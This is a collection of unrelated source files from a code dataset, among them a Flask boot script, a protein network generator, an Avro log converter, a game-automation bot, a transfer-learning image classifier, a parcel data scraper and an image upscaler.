\n @classmethod\n def start(cls):\n cls.__initialize_logger()\n cls.__initialize_script()\n cls.__initialize_routes()\n \n @classmethod\n def __initialize_logger(cls):\n if not Flask.app.config['DEBUG']: return True\n fh = logging.FileHandler(\"log/%s.log\" % (Flask.env))\n formater = logging.Formatter(\"[%(asctime)s] %(levelname)-5s : %(message)s\")\n fh.setFormatter(formater)\n \n if 'DEBUG_LEVEL' in Flask.app.config:\n debug_level = Flask.app.config['DEBUG_LEVEL']\n fh.setLevel(Flask.app.config['DEBUG_LEVEL'])\n \n Flask.app.logger.addHandler(fh)\n \n @classmethod\n def __initialize_script(cls):\n files = os.listdir('config/initializers')\n \n for f in files:\n if re.search(r\".py$\", f):\n __import__('config.initializers.%s' % (f[0:-3]))\n pass\n \n @classmethod\n def __initialize_routes(cls):\n import config.routes\n \n \n \n \n \n \n \n \n 
","sub_path":"config/boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"146964073","text":"from pvalue import Pvalue\nimport argparse\nimport pandas as pd\nimport itertools\nclass NetworkGen:\n def __init__(self,arg1, arg2, arg3):\n self.drugs = arg1\n self.targets = arg2\n self.protein_nodes = arg3\n self.pvalue = Pvalue(500 ,214,self.drugs,self.targets,\"\",\"\")\n self.init()\n \n def init(self):\n df_nodes = pd.read_csv(self.protein_nodes)\n proteins = []\n for row in df_nodes.iterrows():\n #print(type(row),len(row))\n #print(row[0],row[1].to_dict())\n u_acc = row[1].to_dict()['uniprot_accession']\n u_id = row[1].to_dict()['uniprot_id']\n ind = row[1].to_dict()['indications']\n #print(u_acc, u_id, ind)\n proteins.append(u_acc)\n\n #print(len(proteins)) \n pairs = list(itertools.combinations(proteins,2))\n #print(len(pairs))\n #x = pairs[0]\n #pb = self.pvalue.pb(x[0],x[1])\n #print(pb)\n check={}\n fh = open(\"network_edgelist.txt\",\"w\")\n for x in pairs:\n pb = self.pvalue.pb(x[0],x[1])\n if (x[0],x[1]) in check:\n print('DUPLICATE')\n check[(x[0],x[1])] = 1\n check[(x[1],x[0])] = 1\n #print(\"pb:\",pb)\n if pb<=0.05:\n fh.write(x[0]+\" \"+x[1]+\"\\n\")\n fh.close()\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('arg1', type=str, help='drugs.csv location')\n parser.add_argument('arg2', type=str, help='targets.csv location')\n parser.add_argument('arg3', type=str, help='protein_nodes location')\n \n args = parser.parse_args()\n #print(args.arg1,args.arg2,args.arg3)\n ngen = NetworkGen(args.arg1,args.arg2,args.arg3)\n \n\n","sub_path":"networkgen.py","file_name":"networkgen.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"76400929","text":"#!/usr/bin/python\r\n# Author : Michel Benites Nascimento\r\n# Date : 02/24/2018\r\n# Descr. 
: Converting normal logs to avro format\r\n\r\nimport sys\r\nimport avro.schema\r\nfrom avro.datafile import DataFileWriter\r\nfrom avro.io import DatumWriter\r\nimport uuid\r\n\r\n# Main function\r\ndef main ():\r\n\r\n # Define schema of avro file.\r\n schema = avro.schema.Parse(open(\"logs_uuid.avsc\", \"rb\").read())\r\n\r\n # Create a datum writer.\r\n rwriter = DatumWriter(schema)\r\n\r\n files = ['logs_0.txt', 'logs_1.txt', 'logs_2.txt', 'logs_3.txt']\r\n \r\n # Loop to process the files \r\n for f in files:\r\n\r\n # open file and store in a variable\r\n logfile = open(f, \"r\")\r\n text = logfile.readlines()\r\n logfile.close()\r\n\r\n # Set the avro file name (new)\r\n newfile = str(f).replace('.txt','uuid.avro')\r\n\r\n # Create a data file writer.\r\n dfwriter = DataFileWriter (open(newfile, \"wb\"), DatumWriter(), schema)\r\n\r\n # Loop to get information from each line\r\n for line in text:\r\n\r\n # Get the variables from line.\r\n sdt, surl, suser = line.strip().split('\\t')\r\n\r\n # Defines a dictionary structure\r\n data = {}\r\n data['timestamp'] = sdt\r\n data['url'] = surl\r\n data['user'] = suser\r\n data['uuid'] = str(uuid.uuid1())\r\n\r\n # Write the data in the file.\r\n dfwriter.append (data)\r\n\r\n # Close the file after the loop.\r\n dfwriter.close()\r\n\r\n\r\n# Calling main function\r\nif __name__ == '__main__': \r\n sys.exit(main())\r\n","sub_path":"P05.01.LogtoAvroUUID.py","file_name":"P05.01.LogtoAvroUUID.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"62667720","text":"# -*- coding: utf-8 -*-\n\"\"\"Script to fix frozen dependencies.\n\nBecause Pype code needs to run under different versions of Python interpreter\n(yes, even Python 2) we need to include all dependencies as source code\nwithout Python's system stuff. Cx-freeze puts everything into lib and compile\nit as .pyc/.pyo files and that doesn't work for hosts like Maya 2020 with\ntheir own Python interpreter and libraries.\n\nThis script will take ``site-packages`` and copy them to built Pype under\n``dependencies`` directory. It will then compare stuff inside with ``lib``\nfolder in frozen Pype, removing duplicities from there.\n\nThis must be executed after build finished and it is done by build PowerShell\nscript.\n\nNote: Speedcopy can be used for copying if server-side copy is important for\nspeed.\n\n\"\"\"\nimport os\nimport sys\nimport site\nfrom distutils.util import get_platform\nfrom pathlib import Path\nimport shutil\nimport blessed\nimport time\n\n\nterm = blessed.Terminal()\n\n\ndef _print(msg: str, type: int = 0) -> None:\n \"\"\"Print message to console.\n\n Args:\n msg (str): message to print\n type (int): type of message (0 info, 1 error, 2 note)\n\n \"\"\"\n if type == 0:\n header = term.aquamarine3(\">>> \")\n elif type == 1:\n header = term.orangered2(\"!!! \")\n elif type == 2:\n header = term.tan1(\"... \")\n else:\n header = term.darkolivegreen3(\"--- \")\n\n print(\"{}{}\".format(header, msg))\n\n\n_print(\"Starting dependency cleanup ...\")\nstart_time = time.time_ns()\n\n# path to venv site packages\nsites = site.getsitepackages()\n\n# WARNING: this assumes that all we've got is path to venv itself and\n# another path ending with 'site-packages' as is default. 
But because\n# this must run under different platforms, we cannot easily check if this path\n# is the one, because under Linux and macOS site-packages are in a different\n# location.\nsite_pkg = None\nfor s in sites:\n    site_pkg = Path(s)\n    if site_pkg.name == \"site-packages\":\n        break\n\n_print(\"Getting venv site-packages ...\")\nassert site_pkg, \"No venv site-packages are found.\"\n_print(f\"Working with: {site_pkg}\", 2)\n\n\nbuild_dir = \"exe.{}-{}\".format(get_platform(), sys.version[0:3])\n\n# create full path\nbuild_dir = Path(os.path.dirname(__file__)).parent / \"build\" / build_dir\n\n_print(f\"Using build at {build_dir}\", 2)\nif not build_dir.exists():\n    _print(\"Build directory doesn't exist\", 1)\n    _print(\"Probably freezing of code failed. Check ./build/build.log\", 3)\n    sys.exit(1)\n\ndeps_dir = build_dir / \"dependencies\"\n\n# copy all files\n_print(\"Copying dependencies ...\")\nshutil.copytree(site_pkg.as_posix(), deps_dir.as_posix())\n\n# iterate over frozen libs and create list to delete\nlibs_dir = build_dir / \"lib\"\n\nto_delete = []\n_print(\"Finding duplicates ...\")\ndeps_items = list(deps_dir.iterdir())\nfor d in libs_dir.iterdir():\n    if (deps_dir / d.name) in deps_items:\n        to_delete.append(d)\n        _print(f\"found {d}\", 3)\n\n# add openpype and igniter in libs too\nto_delete.append(libs_dir / \"openpype\")\nto_delete.append(libs_dir / \"igniter\")\n\n# delete duplicates\n_print(f\"Deleting {len(to_delete)} duplicates ...\")\nfor d in to_delete:\n    if d.is_dir():\n        shutil.rmtree(d)\n    else:\n        d.unlink()\n\nend_time = time.time_ns()\ntotal_time = (end_time - start_time) / 1000000000\n_print(f\"Dependency cleanup done in {total_time} secs.\")\n","sub_path":"tools/build_dependencies.py","file_name":"build_dependencies.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
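The build_dependencies.py record above prunes from the frozen `lib` folder whatever already exists in `dependencies`. The same idea as a small reusable function over two pathlib trees, sketched below; this is not part of the record, and the paths in the usage comment are made-up examples.

```python
# Sketch: remove top-level entries of prune_dir whose names also exist
# in keep_dir, mirroring the duplicate cleanup in build_dependencies.py.
import shutil
from pathlib import Path

def prune_duplicates(keep_dir: Path, prune_dir: Path) -> list:
    keep_names = {p.name for p in keep_dir.iterdir()}
    removed = []
    for entry in prune_dir.iterdir():
        if entry.name in keep_names:
            # Directories need rmtree; plain files are unlinked.
            if entry.is_dir():
                shutil.rmtree(entry)
            else:
                entry.unlink()
            removed.append(entry)
    return removed

# Hypothetical usage:
# removed = prune_duplicates(Path('build/dependencies'), Path('build/lib'))
# print(f"pruned {len(removed)} duplicates")
```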
{"seq_id":"563647870","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport traceback\nfrom ikabot.helpers.botComm import *\nfrom ikabot.helpers.pedirInfo import *\nfrom ikabot.helpers.signals import setInfoSignal\nfrom ikabot.helpers.getJson import getCiudad\nfrom ikabot.helpers.planearViajes import planearViajes\nfrom ikabot.helpers.recursos import getRecursosDisponibles\nfrom ikabot.helpers.varios import addPuntos\nfrom ikabot.helpers.process import forkear\nfrom ikabot.helpers.gui import banner\n\ndef enviarVino(s):\n\tbanner()\n\tvinoTotal = 0\n\tdict_idVino_diponible = {}\n\t(idsCiudades, ciudades) = getIdsDeCiudades(s)\n\tciudadesVino = {}\n\tfor idCiudad in idsCiudades:\n\t\tesVino = ciudades[idCiudad]['tradegood'] == '1'\n\t\tif esVino:\n\t\t\thtml = s.get(urlCiudad + idCiudad)\n\t\t\tciudad = getCiudad(html)\n\t\t\trecursos = getRecursosDisponibles(html)\n\t\t\tdisponible = int(recursos[1]) - 1000 # leave 1000 spare, just in case\n\t\t\tciudad['disponible'] = disponible if disponible > 0 else 0\n\t\t\tvinoTotal += ciudad['disponible']\n\t\t\tciudadesVino[idCiudad] = ciudad\n\taEnviar = len(ciudades) - len(ciudadesVino)\n\tvinoXciudad = int(vinoTotal / aEnviar)\n\tmaximo = addPuntos(vinoXciudad)\n\n\tif vinoXciudad > 100000:\n\t\tmaximo = maximo[:-6] + '00.000'\n\telif vinoXciudad > 10000:\n\t\tmaximo = maximo[:-5] + '0.000'\n\telif vinoXciudad > 1000:\n\t\tmaximo = maximo[:-3] + '000'\n\telif vinoXciudad > 100:\n\t\tmaximo = maximo[:-2] + '00'\n\telif vinoXciudad > 10:\n\t\tmaximo = maximo[:-1] + '0'\n\tprint('Se puede enviar como máximo {} a cada ciudad'.format(maximo))\n\tcantidad = read(msg='¿Cuanto vino enviar a cada ciudad?:', min=0, max=vinoXciudad)\n\n\tprint('\\nPor enviar {} de vino a cada ciudad'.format(addPuntos(cantidad)))\n\tprint('¿Proceder? [Y/n]')\n\trta = read(values=['y', 'Y', 'n', 'N', ''])\n\tif rta.lower() == 'n':\n\t\treturn\n\n\tforkear(s)\n\tif s.padre is True:\n\t\treturn\n\n\trutas = []\n\tfor idCiudadDestino in idsCiudades:\n\t\tif idCiudadDestino not in ciudadesVino:\n\t\t\thtmlD = s.get(urlCiudad + idCiudadDestino)\n\t\t\tciudadD = getCiudad(htmlD)\n\t\t\tidIsla = ciudadD['islandId']\n\t\t\tfaltante = cantidad\n\t\t\tfor idCiudadOrigen in ciudadesVino:\n\t\t\t\tif faltante == 0:\n\t\t\t\t\tbreak\n\t\t\t\tciudadO = ciudadesVino[idCiudadOrigen]\n\t\t\t\tvinoDisponible = ciudadO['disponible']\n\t\t\t\tfor ruta in rutas:\n\t\t\t\t\t(origen, _, _, _, vn, _, _, _) = ruta\n\t\t\t\t\tif origen['id'] == idCiudadOrigen:\n\t\t\t\t\t\tvinoDisponible -= vn\n\t\t\t\tenviar = faltante if vinoDisponible > faltante else vinoDisponible\n\t\t\t\tfaltante -= enviar\n\t\t\t\truta = (ciudadO, ciudadD, idIsla, 0, enviar, 0, 0, 0)\n\t\t\t\trutas.append(ruta)\n\n\tinfo = '\\nEnviar vino\\n'\n\tfor ruta in rutas:\n\t\t(ciudadO, ciudadD, idIsla, md, vn, mr, cr, az) = ruta\n\t\tinfo = info + '{} -> {}\\nVino: {}\\n'.format(ciudadO['cityName'], ciudadD['cityName'], addPuntos(vn))\n\tsetInfoSignal(s, info)\n\ttry:\n\t\tplanearViajes(s, rutas)\n\texcept:\n\t\tmsg = 'Error en:\\n{}\\nCausa:\\n{}'.format(info, traceback.format_exc())\n\t\tsendToBot(msg)\n\tfinally:\n\t\ts.logout()\n","sub_path":"ikabot/funcion/enviarVino.py","file_name":"enviarVino.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"312295421","text":"import os\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras import Model\nfrom tensorflow.keras import callbacks\nfrom tensorflow.keras import layers\nfrom 
tensorflow.keras import optimizers\nfrom tensorflow.keras import losses\nfrom tensorflow.keras import activations\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.applications import InceptionV3\n\nIMAGE_WIDTH = 128\nIMAGE_HEIGHT = 128\nIMAGE_SIZE = (IMAGE_WIDTH, IMAGE_HEIGHT)\nIMAGE_CHANNELS = 3\n\n\n# Plot results\ndef plot_visualize_training(history):\n fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(12, 12))\n ax1.plot(history.history['loss'], color='b', label=\"Training loss\")\n ax1.plot(history.history['val_loss'], color='r', label=\"validation loss\")\n ax1.set_xticks(np.arange(1, len(history.history['loss']), 1))\n ax1.set_yticks(np.arange(0, 1, 0.1))\n\n ax2.plot(history.history['accuracy'], color='b', label=\"Training accuracy\")\n ax2.plot(history.history['val_accuracy'], color='r', label=\"Validation accuracy\")\n ax2.set_xticks(np.arange(1, len(history.history['loss']), 1))\n\n plt.legend(loc='best', shadow=True)\n plt.tight_layout()\n plt.show()\n\n\n# def plot_sample_images(image_generator, categories=None):\n# plt.figure(figsize=(12, 24))\n#\n# filenames = np.array(image_generator.filenames)\n#\n# if categories is not None:\n# filenames = np.column_stack((filenames, np.array(categories)))\n#\n# samples = random.choices(filenames, k=18)\n#\n# for index, sample in enumerate(samples, start=0):\n# if categories is not None:\n# filename = sample[0]\n# # plt.xlabel(round(float(sample[1])))\n# else:\n# filename = sample\n#\n# image_path = os.path.join(image_generator.directory, filename)\n# sample = image.load_img(image_path, target_size=IMAGE_SIZE)\n#\n# plt.subplot(6, 3, index + 1)\n# plt.imshow(sample)\n#\n# plt.tight_layout()\n# plt.show()\n\n\n# Callbacks\nclass CustomCallback(callbacks.Callback):\n def on_epoch_end(self, epoch, logs=None):\n if logs.get('accuracy') > 0.90:\n print(\"\\nReached 99.5% accuracy so cancelling training!\")\n self.model.stop_training = True\n\n\ndef main():\n # Get pre-trained model\n trained_model = InceptionV3(\n input_shape=(IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS),\n include_top=False\n )\n\n for layer in trained_model.layers:\n layer.trainable = False\n\n trained_model.summary()\n print('last layer output shape: ', trained_model.get_layer('mixed7').output_shape)\n\n # Create model using pre-trained model\n x = layers.Flatten()(trained_model.get_layer('mixed7').output)\n x = layers.Dense(1024, activation=activations.relu)(x)\n x = layers.Dropout(0.2)(x)\n x = layers.Dense(1, activation=activations.sigmoid)(x)\n\n model = Model(\n trained_model.input,\n x\n )\n\n model.compile(\n optimizer=optimizers.RMSprop(learning_rate=0.001),\n loss=losses.BinaryCrossentropy(),\n metrics=['accuracy']\n )\n\n # Augmented training data image flow\n training_image_data_generation = image.ImageDataGenerator(\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n rotation_range=40,\n horizontal_flip=True,\n rescale=1 / 255.\n )\n\n training_image_data = training_image_data_generation.flow_from_directory(\n directory=os.path.join(os.getcwd(), 'datasets', 'images', 'horses_or_humans', 'train'),\n target_size=IMAGE_SIZE,\n class_mode='binary'\n )\n\n #plot_sample_images(training_image_data)\n\n # Validation data should not be augmented\n validation_image_data_generation = image.ImageDataGenerator(\n rescale=1 / 255.\n )\n validation_image_data = validation_image_data_generation.flow_from_directory(\n directory=os.path.join(os.getcwd(), 'datasets', 'images', 'horses_or_humans', 'validation'),\n 
target_size=IMAGE_SIZE,\n class_mode='binary'\n )\n\n # Training model with new data\n model_callbacks = [\n CustomCallback()\n ]\n\n history = model.fit(\n training_image_data,\n epochs= 2, #50,\n validation_data=validation_image_data,\n callbacks=model_callbacks,\n verbose=2\n )\n\n # Predictions for images\n categories = model.predict(validation_image_data)\n # plot_sample_images(validation_image_data, categories)\n\n # Plot results and check for over-fitting\n plot_visualize_training(history)\n\n\nif __name__ == '__main__':\n main()","sub_path":"src/CNN/Exercise_Humans_and_Horses_Transfer_CNN.py","file_name":"Exercise_Humans_and_Horses_Transfer_CNN.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"527768969","text":"import sys\nimport traceback\nimport pathlib\nimport shutil\nfrom iterators.ItemIterator import *\nfrom selectfiledir.filepicker import GetFile\nfrom excelapp.ExcelApp import ExcelApp, ExcelWorkBook\nfrom dto.ExcelSheetDTO import ExcelSheetDTO\nfrom dao.TableDAO.QueryContext import ExecuteQuery\nfrom functions.StopWatch import stop_watch\n\n_log_base_dir = \"/LogModule\"\n\n\nclass FilePicker():\n def __init__(self):\n self.__def_dir = \"DeskTop\"\n self.__ftype = [(\"Excel2003ファイル\", \"*.xlsx\")]\n self.picker = GetFile(self.__def_dir, self.__ftype)\n self.file_list = self.picker.get_files()\n\n def get_file_list(self):\n if self.file_list is False:\n quit()\n else:\n return self.file_list\n\n\nclass ExcelFile():\n def __init__(self):\n # self.baseapp = None\n self.baseapp = ExcelApp()\n self.app = self.baseapp.app\n self.wb = ExcelWorkBook()\n self.ws = None\n\n def open_excelapp(self):\n self.baseapp = ExcelApp()\n\n # @stop_watch\n def open_workbook(self, filepath):\n self.wb.open_wb(self.app, filepath)\n self.ws = self.wb.xlws\n return self.ws\n\n def close_app_wb(self):\n self.wb.close_workbook()\n\n def close_app(self):\n self.app.quit()\n\n def close_baseapp(self):\n self.baseapp.close_App()\n\n def close(self):\n self.close_app_wb()\n self.close_baseapp()\n\n\nclass ExcelDataToDTO():\n def __init__(self):\n self.file_list = []\n self.get_filepath_list()\n self.excelapp = ExcelFile()\n self.item_shelf = ItemShelf()\n self.dto = None\n\n def get_filepath_list(self):\n picker = FilePicker()\n self.file_list = picker.get_file_list()\n\n def get_excel_dto(self):\n for i in self.file_list:\n ws = self.excelapp.open_workbook(i)\n try:\n self.dto = ExcelSheetDTO(ws)\n except AttributeError as e:\n type_, value, traceback_ = sys.exc_info()\n print(traceback.format_exception(type_, value, traceback_))\n self.excelapp.close()\n quit()\n else:\n self.item_shelf.append(self.dto)\n self.excelapp.close_app_wb()\n self.excelapp.close_app()\n return self.item_shelf\n\n def close_app(self):\n self.excelapp.close_app()\n\n\n\nclass DTO():\n def __init__(self):\n self.file_shelf = ItemShelf()\n self.exapp = ExcelFile()\n self.dto = None\n\n def get_filepath_itr(self):\n picker = FilePicker()\n filelist = picker.get_file_list()\n for item in filelist:\n self.file_shelf.append(item)\n\n def change_dir(self,filename):\n currentdir=pathlib.Path(filename).parent\n new_dir=currentdir / \"import済\"\n shutil.move(filename,new_dir)\n\n def get_dto(self,filepath):\n ws = self.exapp.open_workbook(filepath)\n try:\n self.dto = ExcelSheetDTO(ws)\n except Exception as e:\n print(e)\n\n # def ws_open(self,filepath):\n # # tmp = pathlib.Path(self.logbase)\n # # log_file = tmp / \"execute_log.txt\"\n # 
# basename = pathlib.Path(filepath).name\n # try:\n # self.ws = self.excelapp.open_workbook(filepath)\n # except Exception as e:\n # type_, value, traceback_ = sys.exc_info()\n # print(traceback.format_exception(type_, value, traceback_))\n # # self.intext = str(basename) + \": read NG : \" + str(traceback.format_exception(type_, value, traceback_)) + \\\n # # \"\\n\"\n # raise\n # else:\n # # self.intext = str(basename) + \": read OK\\n\"\n # self.close_app_wb()\n # # finally:\n # # with open(log_file,\"a\",encoding=\"utf-8\") as f:\n # # f.write(self.intext)\n\n\n\nif __name__ == \"__main__\":\n dto = DTO()\n dto.get_filepath_itr()\n it = dto.file_shelf.iterator()\n while it.hasnext():\n item = it.next()\n print(item)\n","sub_path":"project01/industrysurvey/mainmodule/CreateDTO.py","file_name":"CreateDTO.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"123239758","text":"mode = \"live\"\n# test_file = \"agent/pcap_files/test.pcap\"\nshark_path = \"C:\\\\Program Files\\\\Wireshark\\\\tshark.exe\"\n# iface = \"enxb827eb6c633a\"\niface = \"6\"\n\noutput_folder = \"../runtime/data/listener\"\nlogs_folder = \"../runtime/logs/listener\"\ndebug_mode = True\nmq_host = \"localhost\"\nmq_port = 1883\n\ncapture_interval = 5","sub_path":"agent/app/listener/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"408507190","text":"# Function for Scraping the Parcel API and Storing in The RedB Database\n# Needs to be converted into an Airflow DAG and Ran on First of Month\n\nimport requests\nimport psycopg2\nfrom psycopg2.extras import Json, DictCursor\nfrom zipfile import ZipFile\nfrom dbfread import DBF\nfrom pandas import DataFrame\n\n# These Secrets are Already Available to Airflow in the RedB Connector\n# See https://github.com/stlrda/REDB-Workflows/blob/master/dags/REDB_ELT.py#L26\nDB_HOST = ''\nDB_NAME = 'redb'\nDB_PORT = 5432\nDB_PASS = ''\nDB_USER = 'airflow_user'\n\nAPI_KEY = ''\n# API_Key needs to be made into an Airflow Connection\n\n\n# Connection to DB (Will get replaced with Airflow Connector)\nconn = psycopg2.connect(host = DB_HOST, port = DB_PORT, user = DB_USER, password = DB_PASS, database = DB_NAME)\n\n\ndef api_get_parcel(url, key, handle):\n query = url + '?key=' + key + '&handle=' + handle\n try:\n resp = requests.get(query)\n data = resp.json()\n except Exception:\n print('API Failure at Handle: ' + handle)\n data = '{\"No\": \"Data\"}'\n return data\n\n\ndef scrape_parcel_api(url, key, list_handles):\n for handle in list_handles:\n # Get Parcel Info from API\n try:\n parcel_info = api_get_parcel(url, key, handle)\n print(handle + ' Returned Data')\n except Exception:\n print('Failure to get Data at:' + handle)\n\n # Put this Info in the Database\n cursor = conn.cursor(cursor_factory=DictCursor)\n try:\n cursor.execute(\"INSERT INTO city_api.parcel_data (handle, parcel_data) VALUES(%s, %s) ON CONFLICT (handle) DO UPDATE SET parcel_data = %s\", (handle, Json(parcel_info), Json(parcel_info)))\n conn.commit()\n except Exception:\n print(\"Could not insert parcel\")\n cursor.close()\n\n\ndef scrape_handles():\n # Download zip file to root directory of repo\n URL = 'https://www.stlouis-mo.gov/data/upload/data-files/prcl_shape.zip'\n r = requests.get(URL, stream=True)\n with open('../parcel_shape.zip', 'wb') as fd:\n for chunk in r.iter_content(chunk_size=128):\n 
fd.write(chunk)\n\n # Extract prcl.dbf from zip file\n with ZipFile('../parcel_shape.zip', 'r') as zipObject:\n file_names = zipObject.namelist()\n for file_name in file_names:\n if file_name.endswith('.dbf'):\n zipObject.extract(file_name, '../')\n print('Extracted ' + file_name + ' from zip file')\n\n # Convert dbf file to pandas dataframe and return list of handles\n dbf = DBF('../prcl.dbf')\n df = DataFrame(iter(dbf))\n\n return df['HANDLE'].to_list()\n\n\ndef main():\n handles = scrape_handles()\n scrape_parcel_api('https://portalcw.stlouis-mo.gov/a/property', API_KEY, handles)\n","sub_path":"scripts/parcels_to_postgres.py","file_name":"parcels_to_postgres.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"394036303","text":"'''\nHeader for Marsha.pdf files\n'''\nimport re\n\nheaders = [\n 'FOLIO #', 'SEG#', 'NAME', 'PHONE', 'USER',\n 'MARSHA #', 'COMPANY', 'ARRIVAL', '#NT', 'DEPARTURE',\n 'ROOM TYPE', 'RATE PRGM', 'RATE', 'ROOM NTS', 'REVEUNE'\n ]\n\nstr_patterns = [\n '***** CANCELLATIONS *****',\n '***** CHANGES 44444'\n ]\n\nregex_patterns = [\n re.compile('\\**\\s(CHANGES|CANCELLATIONS)\\s[\\**\\d]{0,5}'),\n re.compile('REVEN\\w*'),\n re.compile('M[A-Z]RRI\\w*')\n ]\n\np = regex_patterns[0]\n\n\ndef add_html_newlines(text):\n return text.replace(\"\\n\", \"
<br>\\n\")\n\n\n# SO#6750240\n# how to do re.compile with a list in python\nfruit_list = ['apple', 'banana', 'peach', 'plum', 'pineapple', 'kiwi']\nfruit = re.compile('|'.join(fruit_list))\nfruit = re.compile(r'\\b(?:%s)\\b' % '|'.join(fruit_list)) #added word boundaries\n","sub_path":"audit/src/pdf_headers.py","file_name":"pdf_headers.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"52596632","text":"import sys\nfrom PIL import Image, ImageDraw\n\n# Image path\nimagem = sys.argv[1]\n\n# Open the original image in grayscale mode\norigem = Image.open(imagem).convert('L')\n\n# Create the destination image\ndestino = Image.new('L', (origem.width * 2, origem.height * 2))\ndestinoDraw = ImageDraw.Draw(destino)\n\n# Bilinear upscaling\nfor x in range(origem.width):\n    for y in range(origem.height):\n        # Source pixel\n        pOrigem = origem.getpixel((x, y))\n\n        # Pixel to the right\n        if x < origem.width - 1:\n            pDir = origem.getpixel((x + 1, y))\n        else:\n            pDir = origem.getpixel((x, y))\n\n        # Pixel below\n        if y < origem.height - 1:\n            pBaixo = origem.getpixel((x, y + 1))\n        else:\n            pBaixo = origem.getpixel((x, y))\n\n        # Diagonal pixel\n        if x < origem.width - 1 and y < origem.height - 1:\n            pDiag = origem.getpixel((x + 1, y + 1))\n        else:\n            pDiag = origem.getpixel((x, y))\n\n        destinoDraw.point((x * 2, y * 2), pOrigem)\n        destinoDraw.point((x * 2 + 1, y * 2), (int((pOrigem + pDir) / 2)))\n        destinoDraw.point((x * 2, y * 2 + 1), (int((pOrigem + pBaixo) / 2)))\n        destinoDraw.point((x * 2 + 1, y * 2 + 1), (int((pOrigem + pDir + pBaixo + pDiag) / 4)))\n\n# Save the image\ndestino.save('Bilinear_amp_' + imagem)\n","sub_path":"Bilinear_amp.py","file_name":"Bilinear_amp.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"124581878","text":"#Get house share photos script\n#Relies on CSV outputted from getCSVs.py\n#Optionally run interactively in iPython, Jupyter and examine the db data frame or call getData(0, howeverManyImages)\n\nimport sys\nimport os\nimport pandas as pd\nimport numpy\nimport urllib\nimport time\n\n#City to read listings file from. In this example Paris.\n#Set read_csv_loc as location of where you downloaded and unpacked /data/listings.csv.gz from pullCSVs.py\nread_csv_loc = '/home/adam/CVProjects/AirBnBConvNet/Data/PAR/listingsBig.csv'\n#Set out_image_base to wherever you want the image data to go\nout_image_base = '/home/adam/CVProjects/AirBnBConvNet/Data/Pics/PAR/'\n\n#pandas work\ndb = pd.read_csv(read_csv_loc)\nprint(db.keys())\nurls = db['xl_picture_url']\ndict = urls.to_dict()\nvalues = dict.values()\nlength = len(values)\n\ndef getData(start, end):\n    for i in xrange(start, end):\n        delay = abs(numpy.random.randn()) #samples from normal with mean 0, variance 1\n        time.sleep(delay) #Be nice to the servers\n        print(\"Delayed for %s seconds\" % delay)\n        try:\n            link = values[i]\n            id = db.id[i]\n            out_image_location = out_image_base + str(id) + '.jpg'\n            urllib.urlretrieve(link, out_image_location)\n            print(\"Got image %s\" % id)\n        except:\n            e = sys.exc_info()[0] #Pulls error info\n            print(\"Error: %s
\" % e )\n\n#Get all the data!\ngetData(0, length)\n","sub_path":"getPics.py","file_name":"getPics.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"21741099","text":"import argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Split queries and corresponding QREL files.')\n\n parser.add_argument('--src_dir',\n metavar='input data directory',\n help='input data directory',\n type=str, required=True)\n parser.add_argument('--dst_dir',\n metavar='output data directory',\n help='output data directory',\n type=str, required=True)\n parser.add_argument('--seed',\n metavar='random seed',\n help='random seed',\n type=int, default=0)\n parser.add_argument('--partitions_names',\n metavar='names of partitions to split at',\n help='names of partitions to split at separated by comma',\n default=\"bitext,train_fusion,dev\",\n type=str)\n parser.add_argument('--partitions_sizes',\n metavar='sizes of partitions to split at',\n help=\"sizes (in queries) of partitions to split at separated by comma (one of the values can be -1, \"\n \"in that case all left queries go to that partition)\",\n default=\"-1,10000,10000\",\n type=str)\n\n return Arguments(parser.parse_args())\n\nclass Arguments:\n def __init__(self, raw_args):\n self.raw_args = raw_args\n\n @property\n def src_dir(self):\n return self.raw_args.src_dir\n\n @property\n def dst_dir(self):\n return self.raw_args.dst_dir\n \n @property\n def seed(self):\n return self.raw_args.seed\n \n @property \n def partitions_names(self):\n return self.raw_args.partitions_names.split(',')\n \n def partitions_sizes(self, queries_count):\n raw_values = list(map(int, self.raw_args.partitions_sizes.split(',')))\n nondefined_count = 0\n defined_sum = 0\n for value in raw_values:\n if value != -1:\n assert 0 < value < queries_count\n defined_sum += value\n else:\n nondefined_count += 1\n\n if nondefined_count == 0 and defined_sum == queries_count:\n return raw_values\n elif nondefined_count == 1 and defined_sum < queries_count:\n raw_values[raw_values.index(-1)] = queries_count - defined_sum\n return 